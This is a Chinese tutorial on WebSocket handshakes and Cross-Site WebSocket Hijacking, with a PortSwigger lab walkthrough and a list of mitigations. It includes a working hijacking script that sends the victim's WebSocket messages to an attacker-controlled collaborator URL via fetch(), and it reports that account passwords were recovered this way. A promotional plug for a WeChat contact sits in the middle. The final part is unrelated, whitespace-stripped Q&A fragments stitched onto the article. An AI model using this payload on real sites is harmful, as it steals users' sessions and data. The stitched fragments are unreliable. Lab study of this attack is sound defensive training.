声明:本文仅限于技术讨论与分享,严禁用于非法途径。若读者因此作出任何危害网络安全行为后果自负,与本号及原作者无关。
WebSocket是HTML5推出的新协议,是基于TCP的应用层通信协议,它与http协议内容本身没有关系。WebSocket 也类似于 TCP 一样进行握手连接,跟 TCP 不同的是,WebSocket 是基于 HTTP 协议进行的握手,它在客户端和服务器之间提供了一个基于单 TCP 连接的高效全双工通信信道
websocket是持久化的协议,而http是非持久的
当通信协议从 http://或 https://切换到 ws://或 wss://后,表示应用已经切换到了WebSocket协议通信状态
WebSocket连接的建立需要经过连接请求、握手、连接建立三个步骤,如下图
WebSocket连接通常是使用客户端JavaScript创建的
var ws = new WebSocket("wss://normal-website.com/chat");
//该`wss`协议建立在一个加密的TLS连接的WebSocket,而`ws`协议使用未加密的连接。
为了建立连接,浏览器和服务器通过HTTP执行WebSocket握手。浏览器发出WebSocket握手请求,如下所示:
GET /chat HTTP/1.1
Host: normal-website.com
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: wDqumtseNBJdhkihL6PW7w==
Connection: keep-alive, Upgrade
Cookie: session=KOsEJNuflw4Rd9BDNrVmvwBF9rEijeE2
Upgrade: websocket
如果服务器接受连接,则它将返回WebSocket握手响应,如下所示:
HTTP/1.1 101 Switching Protocols
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: 0FFP+2nmNIf/h+4BP36k9uzrYGk=
此时,网络连接保持打开状态,并且可以用于向任一方向发送WebSocket消息。
请求和响应中 的Connection和Upgrade标头表示这是WebSocket握手
原则上,由于WebSocket涉及多个层面,任何与WebSocket有关的web安全漏洞都有可能出现
• 传输到服务器的用户的输入以不安全方式处理,出现SQL注入或XML外部实体注入等
• 通过WebSockets达到的某些盲洞(blind vulnerabilities)可能仅可使用带外(OAST)技术才能检测到
• 如果攻击者控制的数据通过WebSockets传输到其他应用程序用户,则可能导致XSS或其他客户端漏洞
本文主要讲探讨的是跨站WebSocket劫持漏洞-CSWSH
【----帮助网安学习,以下所有学习资料免费领!加vx:yj009991,备注 “博客园” 获取!】
① 网安学习成长路径思维导图
② 60+网安经典常用工具包
③ 100+SRC漏洞分析报告
④ 150+网安攻防实战技术电子书
⑤ 最权威CISSP 认证考试指南+题库
⑥ 超1800页CTF实战技巧手册
⑦ 最新网安大厂面试题合集(含答案)
⑧ APP客户端安全检测指南(安卓+IOS)
Websocket带来的安全特性在一定程度上缓解了一些特性的攻击,但在日渐发展的攻击方式下,其相关漏洞也不断曝光,其中最常见的漏洞是CSWSH(Cross-Site WebSocket Hijacking)跨站WebSocket劫持漏洞
我们可以看见WebSocket的链接过程与http是极其相似的,WebSocket协议在握手阶段是基于HTTP的。它在握手期间是没有规定服务器如何验证客户端的身份,因此,服务器需要采用http客户端认证机制来辨明身份,如常见的cookie、http头基本认证等。这就导致了容易被攻击者利用恶意网页伪装用户的身份,与服务器建立WebSocket连接
CSWSH与跨站请求伪造CSRF的漏洞原理极其类似
相较于CSRF漏洞只能发送伪造请求,跨站WebSocket劫持漏洞却可以建立了一个完整的读/写双向通道,且不受同源策略的限制,这在很大意义上都造成了更大的危害和可操作性
• 执行伪造成用户的未授权操作
与常规CSRF类似,攻击者可以伪造成用户利用生成的WebSocket通道以执行一些敏感操作
• 检索用户可访问的敏感数据
与常规CSRF不同的时,CSWSH是建立一个可双向交互的通道,当客户端向用户发送敏感数据时,攻击者可以将其拦截并记录得到敏感信息
• 靶场
借助于burpsuite练兵场
Lab: Cross-site WebSocket hijacking | Web Security Academy (portswigger.net)
• 浏览器环境
edge浏览器
• 点击启动靶场
• 观察发现存在实时聊天界面,观察发现没有CSRF的令牌
• 将代码复制到body
<script>
var ws = new WebSocket('wss://your-websocket-url');
ws.onopen = function() {
ws.send("READY");
};
ws.onmessage = function(event) {
fetch('https://your-collaborator-url', {method: 'POST', mode: 'no-cors', body: event.data});
};
</script>
• wss://your-websocket-url替换成目前url
• https://your-collaborator-url替换成Burp Collaborator Client或自己搭建的Burp Collaborator 服务器
• 可以点击view exploit测试,也可以直接发给攻击方
• 然后在Burp Collaborator Client多poll几下
• 翻看一下得到账号密码
然后我选择再用dnslog验证一遍
确实可以带出数据,执行敏感操作
• 校验Origin头
• 双向将WebSocket传输数据视为不可信
• 对WebSocket握手信息进行加密保护
• 硬编码WebSockets终结点的URL
我有一个super简单的脚本,它几乎包含了FayeWebSocketGitHub页面上用于处理关闭连接的内容:ws=Faye::WebSocket::Client.new(url,nil,:headers=>headers)ws.on:opendo|event|p[:open]#sendpingcommand#sendtestcommand#ws.send({command:'test'}.to_json)endws.on:messagedo|event|#hereistheentrypointfordatacomingfromtheserver.pJSON.parse(event.d
IntrductionLibwebsocketsisasimple-to-use,MIT-license,pureClibraryprovidingclientandserverforhttp/1,http/2,websockets,MQTTandotherprotocolsinasecurity-minded,lightweight,configurable,scalableandflexibleway.It’seasytobuildandcross-buildviacmakeandissuitablefortasksfromembeddedRTOSthroughmasscloudservi
我有带有gemwebsocket-rails0.7的Rails3.2应用程序。在开发机上,一切正常在生产环境中,我使用Nginx/1.6作为代理服务器,Unicorn作为http服务器。Thin用于独立模式(在https://github.com/websocket-rails/websocket-rails/wiki/Standalone-Server-Mode之后)。nginx配置:location/websocket{proxy_passhttp://localhost:3001/websocket;proxy_http_version1.1;proxy_set_headerUp
目录一、什么是Websocket二、WebSocket部分header介绍三、HTTPVSWebSocket四、什么时候使用WebSockets五、关于SockJS和STOMP一、什么是Websocket根据RFC6455标准,Websocket协议提供了一种标准化的方式在客户端和服务端之间通过TCP连接建立全双工、双向通信渠道。它是一种不同于HTTP的TCP协议,但是被设计为在HTTP基础上运行。Websocket交互始于HTTP请求,该请求会通过HTTPUpgrade请求头去升级请求,进而切换到Websocket协议。请求报文如下:GET/spring-websocket-portfoli
我开始使用websocket-rails,试图将旧的通知轮询系统(在Ruby2.1/Rails4.0上)转换为更现代的WS系统。我在独立模式下使用WebsocketRails,这是我的配置,基本上是默认配置:WebsocketRails.setupdo|config|config.standalone=trueend我还设置了一个在默认端口上运行的新Redis-这里似乎没有通信问题。在客户端,我添加了websocket-rails的JS,并在尝试打开连接和订阅channel时使用:@dispatcher=newWebSocketRails"localhost:3001/websocke
我正在使用在github上找到的当前版本的restful_authentication,我遇到了一堆奇怪的session问题。服务器似乎以某种方式将session分配给不应该的用户。只有在越过注销/登录障碍时才会发生这种情况。这是一个例子。在服务器上没有事件session的情况下,我使用用户A登录帐户。在另一台计算机上,我使用用户B登录。然后当注销用户B时,在注销重定向发生后的某个时间,我将登录为用户A。从这一点开始,我可以继续浏览该站点,就像我以该用户身份登录一样!我通过日志观察到的是,当发生这种劫持时,sessionID是不一样的。用户A在两个session中均已登录,但sessi
ActionCable在生产中不起作用。在开发中运行良好,但在生产中运行不佳。在Ubuntu14.04上使用Puma运行Nginx。我已经检查过redis-server已启动并正在运行。Rails-v5.0.0.1production.log:INFO--:StartedGET"/cable/"[non-WebSocket]for178.213.184.193at2016-11-2514:55:39+0100ERROR--:FailedtoupgradetoWebSocket(REQUEST_METHOD:GET,HTTP_CONNECTION:close,HTTP_UPGRADE:)
我已经使用Sinatra一段时间了,我想通过websockets推送数据来为我的网络应用程序添加一些实时功能。我已经成功地单独使用了gem“em-websocket”,但无法编写一个具有sinatra网络服务器和网络套接字服务器的ruby文件。我试过旋转运行!或开始!方法在单独的线程中关闭但没有成功。有人用过这个吗?我想将它们放在同一个文件中,这样我就可以在两个服务器之间共享变量。 最佳答案 没试过,但应该不会太难:require'em-websocket'require'sinatra/base'require'thin'EM
我是React的新手,我在组件结构和它们之间共享websocket方面遇到了一些问题。该应用程序由类别和产品组成。初始数据加载将通过Ajax请求完成,并且将使用websocket保持数据更新。我的组件层次结构如下所示:类别列表类别产品列表产品CategoriesList保存类别的状态,ProductsList保存类别中产品的状态。所以我想在CategoriesList和ProductsList中使用相同的websocket,但监听不同的websocket事件:category:updated和product:updated。如何在组件之间共享websocket以及初始化它的正确位置?由
今天看到Hoc(HighOrdercomponent)启用renderhijacking,所以我想知道renderhijacking是什么,如果有人知道这个概念请在这里分享。 最佳答案 正如Google先生所说,“渲染劫持的概念是控制一个组件从另一个组件输出什么的能力”。它实际上意味着您通过将组件包装到高阶组件中来装饰您的组件。通过包装,您可以注入(inject)额外的Prop或进行其他更改,这可能会导致渲染逻辑发生变化。它实际上并不“启用”劫持,但通过使用HOC,您可以让您的组件以不同的方式运行。Thisarticlehasave
